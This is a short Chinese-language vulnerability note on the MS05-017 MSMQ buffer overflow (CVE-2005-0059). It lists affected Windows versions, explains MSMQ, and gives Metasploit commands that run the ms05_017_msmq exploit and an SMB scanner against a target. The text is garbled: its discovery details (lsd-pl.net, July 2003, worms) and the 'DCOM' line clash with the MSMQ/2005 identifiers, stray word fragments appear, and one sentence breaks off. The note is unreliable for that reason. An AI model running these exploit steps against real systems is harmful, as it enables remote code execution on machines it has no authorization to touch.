此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。
CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112
DCOM接口的服務器端
Microsoft Windows XP Service Pack 1 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) Microsoft Windows 2000 Service Pack 4 Microsoft Windows 2000 Service Pack 3 Microsoft Windows 98 Second Edition (SE) Microsoft Windows 98
msmq在將輸入的字符串傳遞到緩衝區以前沒有執行正確的驗證,所以,可經過傳遞特製的msmq消息來觸發漏洞形成緩衝區溢出漏洞。漏洞可致使遠程代碼執行、本地提權。因爲msmq
1. msmq( MicroSoft Message Queuing, 微軟消息隊列)是在多個不一樣的應用之間實現互相通訊的一種異步消息傳輸模式,互相通訊的應用能夠位於同一臺機器上,也能夠分佈於網絡空間中的任意位置。msmq實現原理:消息的發送者將想要發送的消息發送至一個message中,而後保存至一個系統公共空間的消息隊列(Message Queuing)中,須要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時,須要藉助hostname來通訊。
Windows 2000 ALL Windows XP SP0-SP1 (English)
利用此payload須要netbios hostname、ip、port三項內容ios
use exploit/windows/dcerpc/ms05_017_msmq set hname <target hostname> set rhost <target ip> set rport <target port> run -j
msf中查看hnamewindows
use scanner/smb/smb_version set rhost <target ip> set threads 24 run
暫未發現,後續補充